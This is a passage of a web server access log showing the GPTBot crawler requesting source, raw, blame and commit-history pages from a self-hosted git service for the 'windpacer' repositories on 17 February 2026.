6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:13:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 23720] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:13:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 31288] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:13:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 33429] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:13:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 12182] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:13:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx" [Client 74.7.227.38] [Length 10141] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx" +[17/Feb/2026:13:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:13:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 2190] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log" +[17/Feb/2026:13:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 39193] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:13:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 42638] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:13:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:13:25:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 50188] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:13:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 22656] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:13:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 36011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:13:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 39264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:13:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 5722] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:13:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 10973] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:13:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9501] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:13:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 27248] [Gzip 11.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:13:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 51493] [Gzip 13.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:13:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10871] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log" +[17/Feb/2026:13:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 39569] [Gzip 13.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:13:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 42037] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:13:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 42205] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:13:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 44640] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:13:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 9945] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:13:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 9944] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:13:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:13:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 9952] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:13:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 9942] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:13:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 9950] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:13:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9951] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:13:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9944] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:13:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 9944] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:13:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 13041] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf" [Client 74.7.227.38] [Length 9902] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf" +[17/Feb/2026:13:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13840] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" +[17/Feb/2026:13:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup" [Client 74.7.227.38] [Length 11445] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" +[17/Feb/2026:13:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11403] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" +[17/Feb/2026:13:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11378] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest" +[17/Feb/2026:13:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11402] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" +[17/Feb/2026:13:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11402] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" +[17/Feb/2026:13:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11402] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" +[17/Feb/2026:13:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.rss" [Client 74.7.227.38] [Length 9686] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" +[17/Feb/2026:13:25:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" +[17/Feb/2026:13:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" [Client 74.7.227.38] [Length 10457] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:13:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11240] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts" +[17/Feb/2026:13:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13623] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" +[17/Feb/2026:13:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup" [Client 74.7.227.38] [Length 9856] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup" +[17/Feb/2026:13:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" [Client 74.7.227.38] [Length 14221] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup" +[17/Feb/2026:13:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" [Client 74.7.227.38] [Length 14398] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup" +[17/Feb/2026:13:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py" +[17/Feb/2026:13:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9930] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py" +[17/Feb/2026:13:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9934] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py" +[17/Feb/2026:13:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9932] [Gzip 2.84] [Sent-to 192.168.0.250] 